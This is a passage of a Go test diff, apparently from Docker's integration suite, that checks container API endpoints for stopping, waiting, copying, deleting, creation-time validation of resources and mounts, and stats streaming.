+	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(waitInspect(name, "{{ .State.Running  }}", "false", 60*time.Second), checker.IsNil)
+
+	// second call to start should give 304
+	status, _, err = sockRequest("POST", "/containers/"+name+"/stop?t=30", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotModified)
+}
+
+func (s *DockerSuite) TestContainerAPIWait(c *check.C) {
+	name := "test-api-wait"
+
+	sleepCmd := "/bin/sleep"
+	if daemonPlatform == "windows" {
+		sleepCmd = "sleep"
+	}
+	dockerCmd(c, "run", "--name", name, "busybox", sleepCmd, "2")
+
+	status, body, err := sockRequest("POST", "/containers/"+name+"/wait", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(waitInspect(name, "{{ .State.Running  }}", "false", 60*time.Second), checker.IsNil)
+
+	var waitres containertypes.ContainerWaitOKBody
+	c.Assert(json.Unmarshal(body, &waitres), checker.IsNil)
+	c.Assert(waitres.StatusCode, checker.Equals, int64(0))
+}
+
+func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) {
+	name := "test-container-api-copy"
+	dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt")
+
+	postData := types.CopyConfig{
+		Resource: "/test.txt",
+	}
+
+	status, _, err := sockRequest("POST", "/containers/"+name+"/copy", postData)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound)
+}
+
+func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	name := "test-container-api-copy"
+	dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt")
+
+	postData := types.CopyConfig{
+		Resource: "/test.txt",
+	}
+
+	status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	found := false
+	for tarReader := tar.NewReader(bytes.NewReader(body)); ; {
+		h, err := tarReader.Next()
+		if err != nil {
+			if err == io.EOF {
+				break
+			}
+			c.Fatal(err)
+		}
+		if h.Name == "test.txt" {
+			found = true
+			break
+		}
+	}
+	c.Assert(found, checker.True)
+}
+
+func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	name := "test-container-api-copy-resource-empty"
+	dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt")
+
+	postData := types.CopyConfig{
+		Resource: "",
+	}
+
+	status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	c.Assert(string(body), checker.Matches, "Path cannot be empty\n")
+}
+
+func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	name := "test-container-api-copy-resource-not-found"
+	dockerCmd(c, "run", "--name", name, "busybox")
+
+	postData := types.CopyConfig{
+		Resource: "/notexist",
+	}
+
+	status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	c.Assert(string(body), checker.Matches, "Could not find the file /notexist in container "+name+"\n")
+}
+
+func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	postData := types.CopyConfig{
+		Resource: "/something",
+	}
+
+	status, _, err := sockRequest("POST", "/v1.23/containers/notexists/copy", postData)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound)
+}
+
+func (s *DockerSuite) TestContainerAPIDelete(c *check.C) {
+	out, _ := runSleepingContainer(c)
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	dockerCmd(c, "stop", id)
+
+	status, _, err := sockRequest("DELETE", "/containers/"+id, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+}
+
+func (s *DockerSuite) TestContainerAPIDeleteNotExist(c *check.C) {
+	status, body, err := sockRequest("DELETE", "/containers/doesnotexist", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound)
+	c.Assert(getErrorMessage(c, body), checker.Matches, "No such container: doesnotexist")
+}
+
+func (s *DockerSuite) TestContainerAPIDeleteForce(c *check.C) {
+	out, _ := runSleepingContainer(c)
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	status, _, err := sockRequest("DELETE", "/containers/"+id+"?force=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+}
+
+func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) {
+	// Windows does not support links
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--name", "tlink1", "busybox", "top")
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	out, _ = dockerCmd(c, "run", "--link", "tlink1:tlink1", "--name", "tlink2", "-d", "busybox", "top")
+
+	id2 := strings.TrimSpace(out)
+	c.Assert(waitRun(id2), checker.IsNil)
+
+	links := inspectFieldJSON(c, id2, "HostConfig.Links")
+	c.Assert(links, checker.Equals, "[\"/tlink1:/tlink2/tlink1\"]", check.Commentf("expected to have links between containers"))
+
+	status, b, err := sockRequest("DELETE", "/containers/tlink2/tlink1?link=1", nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusNoContent, check.Commentf(string(b)))
+
+	linksPostRm := inspectFieldJSON(c, id2, "HostConfig.Links")
+	c.Assert(linksPostRm, checker.Equals, "null", check.Commentf("call to api deleteContainer links should have removed the specified links"))
+}
+
+func (s *DockerSuite) TestContainerAPIDeleteConflict(c *check.C) {
+	out, _ := runSleepingContainer(c)
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	status, _, err := sockRequest("DELETE", "/containers/"+id, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusConflict)
+}
+
+func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	vol := "/testvolume"
+	if daemonPlatform == "windows" {
+		vol = `c:\testvolume`
+	}
+
+	out, _ := runSleepingContainer(c, "-v", vol)
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	source, err := inspectMountSourceField(id, vol)
+	_, err = os.Stat(source)
+	c.Assert(err, checker.IsNil)
+
+	status, _, err := sockRequest("DELETE", "/containers/"+id+"?v=1&force=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+	_, err = os.Stat(source)
+	c.Assert(os.IsNotExist(err), checker.True, check.Commentf("expected to get ErrNotExist error, got %v", err))
+}
+
+// Regression test for https://github.com/docker/docker/issues/6231
+func (s *DockerSuite) TestContainerAPIChunkedEncoding(c *check.C) {
+	conn, err := sockConn(time.Duration(10*time.Second), "")
+	c.Assert(err, checker.IsNil)
+	client := httputil.NewClientConn(conn, nil)
+	defer client.Close()
+
+	config := map[string]interface{}{
+		"Image":     "busybox",
+		"Cmd":       append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...),
+		"OpenStdin": true,
+	}
+	b, err := json.Marshal(config)
+	c.Assert(err, checker.IsNil)
+
+	req, err := http.NewRequest("POST", "/containers/create", bytes.NewBuffer(b))
+	c.Assert(err, checker.IsNil)
+	req.Header.Set("Content-Type", "application/json")
+	// This is a cheat to make the http request do chunked encoding
+	// Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite
+	// https://golang.org/src/pkg/net/http/request.go?s=11980:12172
+	req.ContentLength = -1
+
+	resp, err := client.Do(req)
+	c.Assert(err, checker.IsNil, check.Commentf("error creating container with chunked encoding"))
+	resp.Body.Close()
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusCreated)
+}
+
+func (s *DockerSuite) TestContainerAPIPostContainerStop(c *check.C) {
+	out, _ := runSleepingContainer(c)
+
+	containerID := strings.TrimSpace(out)
+	c.Assert(waitRun(containerID), checker.IsNil)
+
+	statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/stop", nil)
+	c.Assert(err, checker.IsNil)
+	// 204 No Content is expected, not 200
+	c.Assert(statusCode, checker.Equals, http.StatusNoContent)
+	c.Assert(waitInspect(containerID, "{{ .State.Running  }}", "false", 60*time.Second), checker.IsNil)
+}
+
+// #14170
+func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *check.C) {
+	config := struct {
+		Image      string
+		Entrypoint string
+		Cmd        []string
+	}{"busybox", "echo", []string{"hello", "world"}}
+	_, _, err := sockRequest("POST", "/containers/create?name=echotest", config)
+	c.Assert(err, checker.IsNil)
+	out, _ := dockerCmd(c, "start", "-a", "echotest")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
+
+	config2 := struct {
+		Image      string
+		Entrypoint []string
+		Cmd        []string
+	}{"busybox", []string{"echo"}, []string{"hello", "world"}}
+	_, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2)
+	c.Assert(err, checker.IsNil)
+	out, _ = dockerCmd(c, "start", "-a", "echotest2")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
+}
+
+// #14170
+func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCmd(c *check.C) {
+	config := struct {
+		Image      string
+		Entrypoint string
+		Cmd        string
+	}{"busybox", "echo", "hello world"}
+	_, _, err := sockRequest("POST", "/containers/create?name=echotest", config)
+	c.Assert(err, checker.IsNil)
+	out, _ := dockerCmd(c, "start", "-a", "echotest")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
+
+	config2 := struct {
+		Image string
+		Cmd   []string
+	}{"busybox", []string{"echo", "hello", "world"}}
+	_, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2)
+	c.Assert(err, checker.IsNil)
+	out, _ = dockerCmd(c, "start", "-a", "echotest2")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello world")
+}
+
+// regression #14318
+func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCapAddDrop(c *check.C) {
+	// Windows doesn't support CapAdd/CapDrop
+	testRequires(c, DaemonIsLinux)
+	config := struct {
+		Image   string
+		CapAdd  string
+		CapDrop string
+	}{"busybox", "NET_ADMIN", "SYS_ADMIN"}
+	status, _, err := sockRequest("POST", "/containers/create?name=capaddtest0", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	config2 := struct {
+		Image   string
+		CapAdd  []string
+		CapDrop []string
+	}{"busybox", []string{"NET_ADMIN", "SYS_ADMIN"}, []string{"SETGID"}}
+	status, _, err = sockRequest("POST", "/containers/create?name=capaddtest1", config2)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+}
+
+// #14915
+func (s *DockerSuite) TestContainerAPICreateNoHostConfig118(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only support 1.25 or later
+	config := struct {
+		Image string
+	}{"busybox"}
+	status, _, err := sockRequest("POST", "/v1.18/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+}
+
+// Ensure an error occurs when you have a container read-only rootfs but you
+// extract an archive to a symlink in a writable volume which points to a
+// directory outside of the volume.
+func (s *DockerSuite) TestPutContainerArchiveErrSymlinkInVolumeToReadOnlyRootfs(c *check.C) {
+	// Windows does not support read-only rootfs
+	// Requires local volume mount bind.
+	// --read-only + userns has remount issues
+	testRequires(c, SameHostDaemon, NotUserNamespace, DaemonIsLinux)
+
+	testVol := getTestDir(c, "test-put-container-archive-err-symlink-in-volume-to-read-only-rootfs-")
+	defer os.RemoveAll(testVol)
+
+	makeTestContentInDir(c, testVol)
+
+	cID := makeTestContainer(c, testContainerOptions{
+		readOnly: true,
+		volumes:  defaultVolumes(testVol), // Our bind mount is at /vol2
+	})
+	defer deleteContainer(cID)
+
+	// Attempt to extract to a symlink in the volume which points to a
+	// directory outside the volume. This should cause an error because the
+	// rootfs is read-only.
+	query := make(url.Values, 1)
+	query.Set("path", "/vol2/symlinkToAbsDir")
+	urlPath := fmt.Sprintf("/v1.20/containers/%s/archive?%s", cID, query.Encode())
+
+	statusCode, body, err := sockRequest("PUT", urlPath, nil)
+	c.Assert(err, checker.IsNil)
+
+	if !isCpCannotCopyReadOnly(fmt.Errorf(string(body))) {
+		c.Fatalf("expected ErrContainerRootfsReadonly error, but got %d: %s", statusCode, string(body))
+	}
+}
+
+func (s *DockerSuite) TestContainerAPIGetContainersJSONEmpty(c *check.C) {
+	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(string(body), checker.Equals, "[]\n")
+}
+
+func (s *DockerSuite) TestPostContainersCreateWithWrongCpusetValues(c *check.C) {
+	// Not supported on Windows
+	testRequires(c, DaemonIsLinux)
+
+	c1 := struct {
+		Image      string
+		CpusetCpus string
+	}{"busybox", "1-42,,"}
+	name := "wrong-cpuset-cpus"
+	status, body, err := sockRequest("POST", "/containers/create?name="+name, c1)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	expected := "Invalid value 1-42,, for cpuset cpus"
+	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+
+	c2 := struct {
+		Image      string
+		CpusetMems string
+	}{"busybox", "42-3,1--"}
+	name = "wrong-cpuset-mems"
+	status, body, err = sockRequest("POST", "/containers/create?name="+name, c2)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	expected = "Invalid value 42-3,1-- for cpuset mems"
+	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+}
+
+func (s *DockerSuite) TestPostContainersCreateShmSizeNegative(c *check.C) {
+	// ShmSize is not supported on Windows
+	testRequires(c, DaemonIsLinux)
+	config := map[string]interface{}{
+		"Image":      "busybox",
+		"HostConfig": map[string]interface{}{"ShmSize": -1},
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	c.Assert(getErrorMessage(c, body), checker.Contains, "SHM size can not be less than 0")
+}
+
+func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.C) {
+	// ShmSize is not supported on Windows
+	testRequires(c, DaemonIsLinux)
+	var defaultSHMSize int64 = 67108864
+	config := map[string]interface{}{
+		"Image": "busybox",
+		"Cmd":   "mount",
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+
+	c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, defaultSHMSize)
+
+	out, _ := dockerCmd(c, "start", "-i", containerJSON.ID)
+	shmRegexp := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`)
+	if !shmRegexp.MatchString(out) {
+		c.Fatalf("Expected shm of 64MB in mount command, got %v", out)
+	}
+}
+
+func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) {
+	// ShmSize is not supported on Windows
+	testRequires(c, DaemonIsLinux)
+	config := map[string]interface{}{
+		"Image":      "busybox",
+		"HostConfig": map[string]interface{}{},
+		"Cmd":        "mount",
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+
+	c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(67108864))
+
+	out, _ := dockerCmd(c, "start", "-i", containerJSON.ID)
+	shmRegexp := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`)
+	if !shmRegexp.MatchString(out) {
+		c.Fatalf("Expected shm of 64MB in mount command, got %v", out)
+	}
+}
+
+func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) {
+	// ShmSize is not supported on Windows
+	testRequires(c, DaemonIsLinux)
+	config := map[string]interface{}{
+		"Image":      "busybox",
+		"Cmd":        "mount",
+		"HostConfig": map[string]interface{}{"ShmSize": 1073741824},
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+
+	c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(1073741824))
+
+	out, _ := dockerCmd(c, "start", "-i", containerJSON.ID)
+	shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=1048576k`)
+	if !shmRegex.MatchString(out) {
+		c.Fatalf("Expected shm of 1GB in mount command, got %v", out)
+	}
+}
+
+func (s *DockerSuite) TestPostContainersCreateMemorySwappinessHostConfigOmitted(c *check.C) {
+	// Swappiness is not supported on Windows
+	testRequires(c, DaemonIsLinux)
+	config := map[string]interface{}{
+		"Image": "busybox",
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), check.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+
+	c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1))
+}
+
+// check validation is done daemon side and not only in cli
+func (s *DockerSuite) TestPostContainersCreateWithOomScoreAdjInvalidRange(c *check.C) {
+	// OomScoreAdj is not supported on Windows
+	testRequires(c, DaemonIsLinux)
+
+	config := struct {
+		Image       string
+		OomScoreAdj int
+	}{"busybox", 1001}
+	name := "oomscoreadj-over"
+	status, b, err := sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+
+	expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]"
+	msg := getErrorMessage(c, b)
+	if !strings.Contains(msg, expected) {
+		c.Fatalf("Expected output to contain %q, got %q", expected, msg)
+	}
+
+	config = struct {
+		Image       string
+		OomScoreAdj int
+	}{"busybox", -1001}
+	name = "oomscoreadj-low"
+	status, b, err = sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]"
+	msg = getErrorMessage(c, b)
+	if !strings.Contains(msg, expected) {
+		c.Fatalf("Expected output to contain %q, got %q", expected, msg)
+	}
+}
+
+// test case for #22210 where an empty container name caused panic.
+func (s *DockerSuite) TestContainerAPIDeleteWithEmptyName(c *check.C) {
+	status, out, err := sockRequest("DELETE", "/containers/", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	c.Assert(string(out), checker.Contains, "No container name or ID supplied")
+}
+
+func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) {
+	// Problematic on Windows as Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+
+	name := "testing-network-disabled"
+	config := map[string]interface{}{
+		"Image":           "busybox",
+		"Cmd":             []string{"top"},
+		"NetworkDisabled": true,
+	}
+
+	status, _, err := sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	c.Assert(waitRun(name), check.IsNil)
+
+	type b struct {
+		status int
+		body   []byte
+		err    error
+	}
+	bc := make(chan b, 1)
+	go func() {
+		status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil)
+		bc <- b{status, body, err}
+	}()
+
+	// allow some time to stream the stats from the container
+	time.Sleep(4 * time.Second)
+	dockerCmd(c, "rm", "-f", name)
+
+	// collect the results from the stats stream or timeout and fail
+	// if the stream was not disconnected.
+	select {
+	case <-time.After(2 * time.Second):
+		c.Fatal("stream was not closed after container was removed")
+	case sr := <-bc:
+		c.Assert(sr.err, checker.IsNil)
+		c.Assert(sr.status, checker.Equals, http.StatusOK)
+
+		// decode only one object from the stream
+		var s *types.Stats
+		dec := json.NewDecoder(bytes.NewBuffer(sr.body))
+		c.Assert(dec.Decode(&s), checker.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) {
+	type m mounttypes.Mount
+	type hc struct{ Mounts []m }
+	type cfg struct {
+		Image      string
+		HostConfig hc
+	}
+	type testCase struct {
+		config cfg
+		status int
+		msg    string
+	}
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	destPath := prefix + slash + "foo"
+	notExistPath := prefix + slash + "notexist"
+
+	cases := []testCase{
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type:   "notreal",
+						Target: destPath}}}},
+			status: http.StatusBadRequest,
+			msg:    "mount type unknown",
+		},
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type: "bind"}}}},
+			status: http.StatusBadRequest,
+			msg:    "Target must not be empty",
+		},
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type:   "bind",
+						Target: destPath}}}},
+			status: http.StatusBadRequest,
+			msg:    "Source must not be empty",
+		},
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type:   "bind",
+						Source: notExistPath,
+						Target: destPath}}}},
+			status: http.StatusBadRequest,
+			msg:    "bind source path does not exist",
+		},
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type: "volume"}}}},
+			status: http.StatusBadRequest,
+			msg:    "Target must not be empty",
+		},
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type:   "volume",
+						Source: "hello",
+						Target: destPath}}}},
+			status: http.StatusCreated,
+			msg:    "",
+		},
+		{
+			config: cfg{
+				Image: "busybox",
+				HostConfig: hc{
+					Mounts: []m{{
+						Type:   "volume",
+						Source: "hello2",
+						Target: destPath,
+						VolumeOptions: &mounttypes.VolumeOptions{
+							DriverConfig: &mounttypes.Driver{
+								Name: "local"}}}}}},
+			status: http.StatusCreated,
+			msg:    "",
+		},
+	}
+
+	if SameHostDaemon.Condition() {
+		tmpDir, err := ioutils.TempDir("", "test-mounts-api")
+		c.Assert(err, checker.IsNil)
+		defer os.RemoveAll(tmpDir)
+		cases = append(cases, []testCase{
+			{
+				config: cfg{
+					Image: "busybox",
+					HostConfig: hc{
+						Mounts: []m{{
+							Type:   "bind",
+							Source: tmpDir,
+							Target: destPath}}}},
+				status: http.StatusCreated,
+				msg:    "",
+			},
+			{
+				config: cfg{
+					Image: "busybox",
+					HostConfig: hc{
+						Mounts: []m{{
+							Type:          "bind",
+							Source:        tmpDir,
+							Target:        destPath,
+							VolumeOptions: &mounttypes.VolumeOptions{}}}}},
+				status: http.StatusBadRequest,
+				msg:    "VolumeOptions must not be specified",
+			},
+		}...)
+	}
+
+	if DaemonIsLinux.Condition() {
+		cases = append(cases, []testCase{
+			{
+				config: cfg{
+					Image: "busybox",
+					HostConfig: hc{
+						Mounts: []m{{
+							Type:   "volume",
+							Source: "hello3",
+							Target: destPath,
+							VolumeOptions: &mounttypes.VolumeOptions{
+								DriverConfig: &mounttypes.Driver{
+									Name:    "local",
+									Options: map[string]string{"o": "size=1"}}}}}}},
+				status: http.StatusCreated,
+				msg:    "",
+			},
+			{
+				config: cfg{
+					Image: "busybox",
+					HostConfig: hc{
+						Mounts: []m{{
+							Type:   "tmpfs",
+							Target: destPath}}}},
+				status: http.StatusCreated,
+				msg:    "",
+			},
+			{
+				config: cfg{
+					Image: "busybox",
+					HostConfig: hc{
+						Mounts: []m{{
+							Type:   "tmpfs",
+							Target: destPath,
+							TmpfsOptions: &mounttypes.TmpfsOptions{
+								SizeBytes: 4096 * 1024,
+								Mode:      0700,
+							}}}}},
+				status: http.StatusCreated,
+				msg:    "",
+			},
+
+			{
+				config: cfg{
+					Image: "busybox",
+					HostConfig: hc{
+						Mounts: []m{{
+							Type:   "tmpfs",
+							Source: "/shouldnotbespecified",
+							Target: destPath}}}},
+				status: http.StatusBadRequest,
+				msg:    "Source must not be specified",
+			},
+		}...)
+
+	}
+
+	for i, x := range cases {
+		c.Logf("case %d", i)
+		status, b, err := sockRequest("POST", "/containers/create", x.config)
+		c.Assert(err, checker.IsNil)
+		c.Assert(status, checker.Equals, x.status, check.Commentf("%s\n%v", string(b), cases[i].config))
+		if len(x.msg) > 0 {
+			c.Assert(string(b), checker.Contains, x.msg, check.Commentf("%v", cases[i].config))
+		}
+	}
+}
+
+func (s *DockerSuite) TestContainerAPICreateMountsBindRead(c *check.C) {
+	testRequires(c, NotUserNamespace, SameHostDaemon)
+	// also with data in the host side
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	destPath := prefix + slash + "foo"
+	tmpDir, err := ioutil.TempDir("", "test-mounts-api-bind")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+	err = ioutil.WriteFile(filepath.Join(tmpDir, "bar"), []byte("hello"), 666)
+	c.Assert(err, checker.IsNil)
+
+	data := map[string]interface{}{
+		"Image":      "busybox",
+		"Cmd":        []string{"/bin/sh", "-c", "cat /foo/bar"},
+		"HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{{"Type": "bind", "Source": tmpDir, "Target": destPath}}},
+	}
+	status, resp, err := sockRequest("POST", "/containers/create?name=test", data)
+	c.Assert(err, checker.IsNil, check.Commentf(string(resp)))
+	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp)))
+
+	out, _ := dockerCmd(c, "start", "-a", "test")
+	c.Assert(out, checker.Equals, "hello")
+}
+
+// Test Mounts comes out as expected for the MountPoint
+func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) {
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	destPath := prefix + slash + "foo"
+
+	var (
+		err     error
+		testImg string
+	)
+	if daemonPlatform != "windows" {
+		testImg, err = buildImage("test-mount-config", `
+	FROM busybox
+	RUN mkdir `+destPath+` && touch `+destPath+slash+`bar
+	CMD cat `+destPath+slash+`bar
+	`, true)
+	} else {
+		testImg = "busybox"
+	}
+	c.Assert(err, checker.IsNil)
+
+	type testCase struct {
+		cfg      mounttypes.Mount
+		expected types.MountPoint
+	}
+
+	cases := []testCase{
+		// use literal strings here for `Type` instead of the defined constants in the volume package to keep this honest
+		// Validation of the actual `Mount` struct is done in another test is not needed here
+		{mounttypes.Mount{Type: "volume", Target: destPath}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
+		{mounttypes.Mount{Type: "volume", Target: destPath + slash}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
+		{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath}},
+		{mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath}},
+		{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath}},
+	}
+
+	if SameHostDaemon.Condition() {
+		// setup temp dir for testing binds
+		tmpDir1, err := ioutil.TempDir("", "test-mounts-api-1")
+		c.Assert(err, checker.IsNil)
+		defer os.RemoveAll(tmpDir1)
+		cases = append(cases, []testCase{
